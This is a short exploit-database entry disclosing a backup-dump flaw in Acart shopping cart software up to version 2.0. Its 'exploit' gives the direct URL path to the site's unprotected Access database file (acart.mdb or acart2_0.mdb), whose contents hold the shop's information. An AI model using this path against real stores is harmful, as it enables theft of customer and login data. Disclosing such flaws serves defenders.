id: 12020
date: 04/27/2010
title: Acart <= 2.0 Shopping Cart Software Backup Dump Vulnerability
author: indoushka
cves: 

=============================================================
Acart <= 2.0 Shopping Cart Software Backup Dump Vulnerability 
=============================================================

========================================================================================                 
| # Title    : Acart <= 2.0 Shopping Cart Software Backup Dump Vulnerability          
| # Author   : indoushka                                                                                                             
| # Home     : www.iqs3cur1ty.com                                                                                                                                                                                                                       
| # Bug      : Backup                                                            
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 
     1 - http://127.0.0.1/acart1_0/acart.mdb
      
     2- http://127.0.0.1/acart1_0/signin.asp
      
  you find the information in the db. version 2.0 uses "acart2_0.mdb"



#  0day.today [2023-03-23]  #